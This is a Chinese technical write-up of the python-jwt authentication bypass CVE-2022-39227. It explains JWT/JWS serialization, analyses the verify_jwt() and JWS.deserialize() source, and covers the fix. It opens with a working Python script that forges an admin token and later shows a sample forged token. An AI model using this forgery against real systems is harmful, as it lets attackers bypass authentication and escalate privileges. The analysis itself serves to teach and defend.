CVE-2022-39227描述了python-jwt < 3.3.4模块存在身份验证绕过漏洞,即攻击者在不知道JWT的加密密钥的情况下,仍然可以伪造JWT的内容。

举个例子:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import json
import python_jwt as jwt # python-jwt == 3.3.3
import jwcrypto.jwk as jwk
from datetime import timedelta

secret_key = jwk.JWK.generate(kty='oct', size=256)

# 生成原始JWT
original_payload = {"admin": False}
original_token = jwt.generate_jwt(original_payload, secret_key, 'HS256', timedelta(minutes=5))

print("---- Original JWT ----")
print(original_token)

# 攻击
[header, payload, signature] = original_token.split('.')
decoded_payload = json.loads(jwt.base64url_decode(payload))
decoded_payload['admin'] = True # 篡改admin值进行提权
forged_payload = jwt.base64url_encode(json.dumps(decoded_payload))
forged_token = '''{
    "%s.%s.": "",
    "protected": "%s",
    "payload": "%s",
    "signature": "%s"
}''' % (header, forged_payload, header, payload, signature)

print("---- Forged Token ----")
print(forged_token)

# 验证
verify_result = jwt.verify_jwt(forged_token, secret_key, ['HS256'])

print("---- Verify Result ----")
print(verify_result)

运行结果如下:

image.png 可以看到,forged_token与先前的original_token的结构似乎截然不同,却顺利地通过了verify_jwt()的校验,并且解析结果就是攻击者篡改后的'admin': True的结果。

这样的结果令人不可思议:为什么攻击者连signature都没修改,就顺利通过了校验呢?下面我们将详细探讨。

0x01 前置知识(JWT&JWS)

JWT

我们来观察这样一个字符串:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30

可以注意到,这个字符串由3个部分组成,每个部分都经过了base64编码,并以.连接。对每个部分进行base64解码,可以发现第一个部分内容为

1
2
3
4
{
  "alg": "HS256",
  "typ": "JWT"
}

我们将其称作Header,中文翻译为“头部”。这里,alg字段标明了字符串使用的加密算法是HS256typ字段标明了这一个编码对象是JWT

第二个部分内容为

1
2
3
4
5
6
{
  "sub": "1234567890",
  "name": "John Doe",
  "admin": true,
  "iat": 1516239022
}

我们将其称作Payload,中文翻译为“载荷”。这里,我们可以注意到像subiat这样的注册声明名称(Registered Claim Names),也有nameadmin这样的用户自行定义的字段。关于更多注册声明名称的含义,读者可查阅RFC 7519等资料进一步了解。

第三个解码后似乎是一团乱码,我们不妨看看它的Hex:

00000000  28 c5 05 b0 80 d3 9c 59 b2 1b 79 cc 88 63 3a 1f  |(Å.°.Ó.Y².yÌ.c:.|
00000010  d1 4d 15 44 4e 7f 7c 21 ed 29 aa 26 94 15 df     |ÑM.DN.|!í)ª&..ß|

这个部分称作Signature,也就是签名。这意味着其没有可读性,而用于校验字符串是否被别人篡改SignatureHeaderPayload部分的内容进行签名。

Header部分的alg字段标明了签名使用的是HS256算法,也就是 HMAC using SHA-256 算法计算得到的签名值。关于更多alg字段含义,读者可查阅RFC 7518等资料进一步了解。

既然Header部分的typ字段表明了这个字符串是JWT,我们也理所当然将这个字符串称作JWT(JSON Web Token)。上述关于HeaderPayloadSignature的介绍也是关于JWT的介绍。

其实,这个字符串也可称作“紧凑型JWS”。

JWS

JWS(JSON Web Signature)拥有两种形式,一种是JSON形式的,称作JWS JSON 序列化(JWS JSON Serialization),另一种就是如刚才我们所见的,称作JWS 紧凑序列化(JWS Compact Serialization)。

JWS JSON Serialization

JWS JSON 序列化的通用形式如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
 {
    "payload":"<payload contents>",
    "signatures":[
       {"protected":"<integrity-protected header 1 contents>",
	    "header":<non-integrity-protected header 1 contents>,
	    "signature":"<signature 1 contents>"},
        ...
       {"protected":"<integrity-protected header N contents>",
	    "header":<non-integrity-protected header N contents>,
	    "signature":"<signature N contents>"}]
 }

遇到单个signature的情况下,我们可以使用扁平化的JWS JSON 序列化(Flattened JWS JSON Serialization):

1
2
3
4
5
6
 {
    "payload":"<payload contents>",
    "protected":"<integrity-protected header contents>",
    "header":<non-integrity-protected header contents>,
    "signature":"<signature contents>"
 }

综上所述,JWS JSON 序列化有通用形式、扁平化形式这两种形式,其中扁平化形式用于优化只有单个signature的情况。

JWS JSON 序列化的头部分为“受保护的头部”(JWS Protected Header)和“不受保护的头部”(JWS Unprotected Header)两种,分别对应protectedheader字段。因此,protected字段和payload字段的内容会参与签名,从而防止在传输过程中遭到攻击者篡改。而header字段内容不会参与签名。

JWS Compact Serialization

JWS 紧凑序列化的格式也正如刚才对JWT的介绍所示,即

BASE64URL(UTF8(JWS Protected Header)) || '.' ||
BASE64URL(JWS Payload) || '.' ||
BASE64URL(JWS Signature)

值得注意的是,JWS 紧凑序列化只有Protected Header,也就是说相对于JWS JSON 序列化而言,它的header内容全部属于protected字段。因此JWS 紧凑序列化的HeaderPayload都会参与签名,这恰好与JWT的情况相同。

由此可见,对于刚才所举例子的字符串,我们可以同时称呼它为“JWT”和“JWS 紧凑序列化”。

0x02 源码分析

回到正题上来,我们对源码进行分析,从而理解漏洞的形成原因以及如何利用该漏洞。

verify_jwt()

verify_jwt()的源码如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
def verify_jwt(jwt,
               pub_key=None,
               allowed_algs=None,
               iat_skew=timedelta(),
               checks_optional=False,
               ignore_not_implemented=False):

    if allowed_algs is None:
        allowed_algs = []

    if not isinstance(allowed_algs, list):
        # jwcrypto only supports list of allowed algorithms
        raise _JWTError('allowed_algs must be a list')

    header, claims, _ = jwt.split('.')

    parsed_header = json_decode(base64url_decode(header))

    alg = parsed_header.get('alg')
    if alg is None:
        raise _JWTError('alg header not present')
    if alg not in allowed_algs:
        raise _JWTError('algorithm not allowed: ' + alg)

    if not ignore_not_implemented:
        for k in parsed_header:
            if k not in JWSHeaderRegistry:
                raise _JWTError('unknown header: ' + k)
            if not JWSHeaderRegistry[k].supported:
                raise _JWTError('header not implemented: ' + k)

    if pub_key:
        token = JWS()
        token.allowed_algs = allowed_algs
        token.deserialize(jwt, pub_key)
    elif 'none' not in allowed_algs:
        raise _JWTError('no key but none alg not allowed')

    parsed_claims = json_decode(base64url_decode(claims))

    utcnow = datetime.utcnow()
    now = timegm(utcnow.utctimetuple())

    typ = parsed_header.get('typ')
    if typ is None:
        if not checks_optional:
            raise _JWTError('typ header not present')
    elif typ != 'JWT':
        raise _JWTError('typ header is not JWT')

    iat = parsed_claims.get('iat')
    if iat is None:
        if not checks_optional:
            raise _JWTError('iat claim not present')
    elif iat > timegm((utcnow + iat_skew).utctimetuple()):
        raise _JWTError('issued in the future')

    nbf = parsed_claims.get('nbf')
    if nbf is None:
        if not checks_optional:
            raise _JWTError('nbf claim not present')
    elif nbf > now:
        raise _JWTError('not yet valid')

    exp = parsed_claims.get('exp')
    if exp is None:
        if not checks_optional:
            raise _JWTError('exp claim not present')
    elif exp <= now:
        raise _JWTError('expired')

    return parsed_header, parsed_claims

代码很长,我们进行逐段分析:

  1. 对参数allowed_algs进行校验
1
2
3
4
5
6
7
# allowed_algs为空时的处理
if allowed_algs is None:
    allowed_algs = []

# 如果不是列表则抛出错误
if not isinstance(allowed_algs, list):
    raise _JWTError('allowed_algs must be a list')
  1. 按照.号将JWT分为三段,并将header部分解码
1
2
header, claims, _ = jwt.split('.')
parsed_header = json_decode(base64url_decode(header))
  1. 检验header字段是否合规
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# 判断alg字段内容是否合规
alg = parsed_header.get('alg')
if alg is None:
    raise _JWTError('alg header not present')
if alg not in allowed_algs:
    raise _JWTError('algorithm not allowed: ' + alg)

# 检查Header是否匹配JWSHeaderRegistry(默认不检查)
if not ignore_not_implemented:
    for k in parsed_header:
        if k not in JWSHeaderRegistry:
            raise _JWTError('unknown header: ' + k)
        if not JWSHeaderRegistry[k].supported:
            raise _JWTError('header not implemented: ' + k)
  1. 对签名进行验证

函数对签名的验证过程在JWS.deserialize()中,本文随后对其进行源码分析。

1
2
3
4
5
6
7
8
# 如果传参了公钥pub_key便对签名进行验证
if pub_key:
    token = JWS()
    token.allowed_algs = allowed_algs
    token.deserialize(jwt, pub_key) # 对JWT进行JWS反序列化
# 如果不允许不签名就抛出错误
elif 'none' not in allowed_algs:
    raise _JWTError('no key but none alg not allowed')
  1. payload部分进行相关检验
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
parsed_claims = json_decode(base64url_decode(claims))

utcnow = datetime.utcnow()
now = timegm(utcnow.utctimetuple())

typ = parsed_header.get('typ')
if typ is None:
    if not checks_optional:
        raise _JWTError('typ header not present')
elif typ != 'JWT':
    raise _JWTError('typ header is not JWT')

iat = parsed_claims.get('iat')
if iat is None:
    if not checks_optional:
        raise _JWTError('iat claim not present')
elif iat > timegm((utcnow + iat_skew).utctimetuple()):
    raise _JWTError('issued in the future')

nbf = parsed_claims.get('nbf')
if nbf is None:
    if not checks_optional:
        raise _JWTError('nbf claim not present')
elif nbf > now:
    raise _JWTError('not yet valid')

exp = parsed_claims.get('exp')
if exp is None:
    if not checks_optional:
        raise _JWTError('exp claim not present')
elif exp <= now:
    raise _JWTError('expired')
  1. 返回解析后的headerpayload部分的内容
1
return parsed_header, parsed_claims

总结一下,对于这样的一个JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzAzMzI1MiwiaWF0IjoxNzQ3MDMyOTUyLCJqdGkiOiJWNEtjSnVBRnRSUEd0ZnVzbVdJbTZRIiwibmJmIjoxNzQ3MDMyOTUyfQ.tuY-k9-4kB5mVtL4PAZn9-ABdr6eBPE-24j_jIAeAQM

经过verify_jwt()的处理后,可以得到:

1
2
3
4
5
6
7
header, claims, _ = jwt.split('.')
# header = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
# claims = eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzAzMzI1MiwiaWF0IjoxNzQ3MDMyOTUyLCJqdGkiOiJWNEtjSnVBRnRSUEd0ZnVzbVdJbTZRIiwibmJmIjoxNzQ3MDMyOTUyfQ
parsed_header = json_decode(base64url_decode(header))
# parsed_header = {"alg":"HS256","typ":"JWT"}
parsed_claims = json_decode(base64url_decode(claims))
# parsed_claims = {"admin":false,"exp":1747033252,"iat":1747032952,"jti":"V4KcJuAFtRPGtfusmWIm6Q","nbf":1747032952}

并且会将JWT传入到JWS.deserialize()进行签名验证。

JWS.deserialize()

JWS.deserialize()的源码如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
def deserialize(self, raw_jws, key=None, alg=None):
    self.objects = {}
    o = {}
    try:
        try:
            djws = json_decode(raw_jws)
            if 'signatures' in djws:
                o['signatures'] = []
                for s in djws['signatures']:
                    os = self._deserialize_signature(s)
                    o['signatures'].append(os)
                    self._deserialize_b64(o, os.get('protected'))
            else:
                o = self._deserialize_signature(djws)
                self._deserialize_b64(o, o.get('protected'))

            if 'payload' in djws:
                if o.get('b64', True):
                    o['payload'] = base64url_decode(str(djws['payload']))
                else:
                    o['payload'] = djws['payload']

        except ValueError:
            data = raw_jws.split('.')
            if len(data) != 3:
                raise InvalidJWSObject('Unrecognized'
                                        ' representation') from None
            p = base64url_decode(str(data[0]))
            if len(p) > 0:
                o['protected'] = p.decode('utf-8')
                self._deserialize_b64(o, o['protected'])
            o['payload'] = base64url_decode(str(data[1]))
            o['signature'] = base64url_decode(str(data[2]))

        self.objects = o

    except Exception as e:  # pylint: disable=broad-except
        raise InvalidJWSObject('Invalid format') from e

    if key:
        self.verify(key, alg)

该方法同时实现了对JWS JSON 序列化JWS 紧凑序列化的反序列化。首先,JWS.deserialize()先对传入的字符串尝试进行JSON解析。如果能正常解析,则进入对JWS JSON 序列化的处理流程;反之,如果抛出了ValueError错误,则进入对JWS 紧凑序列化的处理流程。

对JWS JSON 序列化的处理流程如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
try:
    djws = json_decode(raw_jws) # JSON解析

    # 对通用形式的处理
    if 'signatures' in djws:
        o['signatures'] = []
        for s in djws['signatures']:
            os = self._deserialize_signature(s) # 提取protected、header、signature
            o['signatures'].append(os)
            self._deserialize_b64(o, os.get('protected')) # 校验b64值

    # 对扁平化形式的处理
    else:
        o = self._deserialize_signature(djws) # 提取protected、signature
        self._deserialize_b64(o, o.get('protected')) # 校验b64值

    if 'payload' in djws:
        if o.get('b64', True): # 若b64为True(True为默认值,且可以不标注)
            o['payload'] = base64url_decode(str(djws['payload'])) # 对payload进行base64解码
        else:
            o['payload'] = djws['payload']

对JWS 紧凑序列化的处理流程如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
except ValueError:
    data = raw_jws.split('.') # 将字符串按照'.'拆分

    # 拆分后如果不是3个部分则说明格式错误
    if len(data) != 3:
        raise InvalidJWSObject('Unrecognized'
                               ' representation') from None

    # 取header部分
    p = base64url_decode(str(data[0]))
    if len(p) > 0:
        o['protected'] = p.decode('utf-8') # JWS紧凑序列化的header
        self._deserialize_b64(o, o['protected'])
    o['payload'] = base64url_decode(str(data[1]))
    o['signature'] = base64url_decode(str(data[2]))

Tip:

这里分享一个笔者联想到的,与漏洞分析无关的小点子。

观察到代码中的if len(p) > 0,让人好奇:先前的if len(data) != 3似乎已经保证了Protected Header部分的内容不会为”空“了,为什么还需要加上这个校验呢?事实上,if len(data) != 3只能保证data[0]的内容不会为null。然而当data[0]的内容为'==''===''===='时,base64url_decode()也会返回空字符串,Protected Header部分的内容仍然可能为“空”。因此if len(p) > 0校验并非冗余。

那么Protected Header的内容为=='===''===='时会发生什么?当len(p) == 0,在此后的JWS._verify()方法中也会报错No "alg" in headers。因此Protected Header的内容始终不能为“空”,即使想用刚才的一堆=滥竽充数也不行。

总结一下,JWS.deserialize()会首先尝试对传入的字符串进行JSON解析,如果行不通的话,就会再尝试进行JWS 紧凑序列化的解析。

最后,若参数key存在,则对signature进行验证。

1
2
if key:
    self.verify(key, alg)

0x03 漏洞解析

我们观察一下恶意token的格式:

1
2
3
4
5
6
forged_token = '''{
    "%s.%s.": "",
    "protected": "%s",
    "payload": "%s",
    "signature": "%s"
}''' % (header, forged_payload, header, payload, signature)

也就是

1
2
3
4
5
6
{
    "<header>.<forged_payload>.": "",
    "protected": "<header>",
    "payload": "<payload>",
    "signature": "<signature>"
}

我们首先举个恶意token的例子,看看漏洞是如何利用的。

1
2
3
4
5
6
{
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6IHRydWUsICJleHAiOiAxNzQ3MDQwOTM5LCAiaWF0IjogMTc0NzA0MDYzOSwgImp0aSI6ICJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwgIm5iZiI6IDE3NDcwNDA2Mzl9.": "",
    "protected": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9",
    "payload": "eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzA0MDkzOSwiaWF0IjoxNzQ3MDQwNjM5LCJqdGkiOiJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwibmJmIjoxNzQ3MDQwNjM5fQ",
    "signature": "1BftylfzfqBgMFnZ7Sp5S-NNZSYtax2TKEg_CXXmMbM"
}

乍一看这就是一个JSON字符串。在JWS.deserialize()眼中,它是一个JWS JSON 序列化。不过,它在verify_jwt()眼中却是这样的一个JWT:

`Header`: {"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
`Payload`: eyJhZG1pbiI6IHRydWUsICJleHAiOiAxNzQ3MDQwOTM5LCAiaWF0IjogMTc0NzA0MDYzOSwgImp0aSI6ICJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwgIm5iZiI6IDE3NDcwNDA2Mzl9
`Signature`: ": "","protected": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9","payload": "eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzA0MDkzOSwiaWF0IjoxNzQ3MDQwNjM5LCJqdGkiOiJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwibmJmIjoxNzQ3MDQwNjM5fQ","signature": "1BftylfzfqBgMFnZ7Sp5S-NNZSYtax2TKEg_CXXmMbM"}

因此,对于这个恶意token,经过verify_jwt()解析后为:

1
2
3
4
5
6
7
header, claims, _ = jwt.split('.')
# header = {"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
# claims = eyJhZG1pbiI6IHRydWUsICJleHAiOiAxNzQ3MDQwOTM5LCAiaWF0IjogMTc0NzA0MDYzOSwgImp0aSI6ICJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwgIm5iZiI6IDE3NDcwNDA2Mzl9
parsed_header = json_decode(base64url_decode(header))
# parsed_header = {"alg":"HS256","typ":"JWT"}
parsed_claims = json_decode(base64url_decode(claims))
# parsed_claims = {"admin": true, "exp": 1747040939, "iat": 1747040639, "jti": "iFe5USzyXdftxJwV4TFR0Q", "nbf": 1747040639}

JWS.deserialize()会将它当作扁平化形式的JWS JSON 序列化进行处理。解析结果为:

1
2
3
4
5
o = self._deserialize_signature(djws)
# o['protected'] = {"alg":"HS256","typ":"JWT"}
# o['signature'] = b'\xd4\x17\xed\xcaW\xf3~\xa0`0Y\xd9\xed*yK\xe3Me&-k\x1d\x93(H?\tu\xe61\xb3'
o['payload'] = base64url_decode(str(djws['payload']))
# o['payload'] = {"admin":false,"exp":1747040939,"iat":1747040639,"jti":"iFe5USzyXdftxJwV4TFR0Q","nbf":1747040639}

Tip:

在对header进行base64解码时,会因为{"字符抛出异常吗?

JWS.deserialize()进行base64解码时使用的是jwcrypto.common.base64url_decode(),这一函数其实调用了base64.urlsafe_b64decode(),而它其实调用了base64.b64decode()。阅读base64.b64decode()官方文档,我们得知:

If validate is False (the default), characters that are neither in the normal base-64 alphabet nor the alternative alphabet are discarded prior to the padding check. If validate is True, these non-alphabet characters in the input result in a binascii.Error.

jwcrypto.common.base64url_decode()base64.urlsafe_b64decode()都没有将validate值设置为True,因此程序会丢弃{"字符,也就不会因为这些字符而抛出异常。

JWS.deserialize()会提取这个JSON字符串中protectedpayloadsignature字段的值。它获取的protectedpayload的值都来源于original_token,将它们带入验证,最终signature验证通过也是理所当然的。

verify_jwt()得知signature验证通过了,就返回parsed_headerparsed_claims的值。可是,返回的parsed_claims却是攻击者篡改过的值,其中包含"admin": true。至此,攻击者提权成功。

让我们总结一下思路。

  • 攻击者精心构造恶意token,这个恶意token同时符合JWS JSON 序列化JWS 紧凑序列化的特征。

  • JWS.deserialize()的期望效果是将传入的token当作JWS 紧凑序列化,因为一个正常的JWT同时也是JWS 紧凑序列化。

  • 然而JWS.deserialize()将恶意token当作了JWS JSON 序列化,在对signature进行校验时使用的值是原汁原味的<header><payload>,校验自然成功。

  • 得知signature校验成功后,verify_jwt()返回的期望值应当是<header><payload>

  • 然而对于恶意token,verify_jwt()返回的值却是<header><forged_payload>。攻击者成功欺骗了verify_jwt(),使其返回了攻击者篡改的值。

0x04 漏洞修复

阅读作者修复漏洞的commit,我们得知:verify_jwt()在进行后续处理前,首先会通过_check_jwt_format()验证JWT的格式:

1
2
3
4
_jwt_re = re.compile(r'^[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]*$')
def _check_jwt_format(jwt):
    if not _jwt_re.match(jwt):
        raise _JWTError('invalid JWT format')

也就是说,JWT不再能包含{}":等等符号了。攻击者无法构造符合JWS JSON 序列化特征的JWT进行攻击,漏洞修复完成。

相关文章